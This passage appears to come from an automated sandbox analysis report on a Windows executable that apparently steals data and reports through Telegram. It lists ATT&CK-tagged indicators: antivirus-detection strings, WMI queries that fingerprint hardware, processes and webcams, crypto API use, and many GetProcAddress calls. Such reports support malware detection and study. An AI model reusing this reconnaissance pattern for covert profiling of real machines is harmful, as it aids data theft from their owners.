\"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptDestroyKey\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateDirectory\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptGetProperty\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptSetProperty\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"DetectAntivirus\" (Indicator: \"antivirus\") in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\n \"GetAntivirus\" (Indicator: \"antivirus\") in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\n \"\\nAntivirus:\" (Indicator: \"antivirus\") in Source: 600014a-telegram~UploadFile\n \"Antivirus\" (Indicator: \"antivirus\") in Source: 6000325-IdSender~SendInfo", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"Select * from Win32_ComputerSystem\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_VideoController\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select * from win32_videocontroller\")\n \"Select * from AntivirusProduct\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select * from antivirusproduct\")\n \"SELECT ExecutablePath, ProcessID FROM Win32_Process\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select executablepath, processid from win32_process\")\n \"SELECT * FROM win32_operatingsystem\" (Source: 6000129-SystemInfo~GetWindowsVersionName, Indicator: \"select * from win32_operatingsystem\")\n \"Select ProcessorId From Win32_processor\" (Source: 600012c-SystemInfo~GetHardwareID, Indicator: \"select processorid from win32_processor\")\n \"SELECT * FROM Win32_Processor\" (Source: 6000133-SystemInfo~GetCPUName, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 6000135-SystemInfo~GetRamAmount, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Source: 6000188-WebcamScreenshot~GetConnectedCamerasCount, Indicator: \"select * from win32_pnpentity where (pnpclass = 'image' or pnpclass = 'camera')\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"Select * from Win32_ComputerSystem\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_VideoController\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select * from win32_videocontroller\")\n \"Select * from AntivirusProduct\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select * from antivirusproduct\")\n \"SELECT ExecutablePath, ProcessID FROM Win32_Process\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, Indicator: \"select executablepath, processid from win32_process\")\n \"SELECT * FROM win32_operatingsystem\" (Source: 6000129-SystemInfo~GetWindowsVersionName, Indicator: \"select * from win32_operatingsystem\")\n \"Select ProcessorId From Win32_processor\" (Source: 600012c-SystemInfo~GetHardwareID, Indicator: \"select processorid from win32_processor\")\n \"SELECT * FROM Win32_Processor\" (Source: 6000133-SystemInfo~GetCPUName, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 6000135-SystemInfo~GetRamAmount, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Source: 6000188-WebcamScreenshot~GetConnectedCamerasCount, Indicator: \"select * from win32_pnpentity where (pnpclass = 'image' or pnpclass = 'camera')\"), \"SELECT * FROM Win32_VideoController\" (Source: 00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp, Indicator: \"select * from win32_videocontroller\"), \"SELECT * FROM Win32_Processor\" (Source: 00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp, Indicator: \"select * from win32_processor\"), \"SELECT * FROM win32_operatingsystem\" (Source: 00000000-00006044.00000002.70084.00972000.00000020.mdmp, Indicator: \"select * from win32_operatingsystem\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-10", "type": 2, "relevance": 2, "name": "Found a reference to a known community page", "description": "Found string \"twitter\" (Indicator: \"twitter\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetProcAddress\" with a parameter 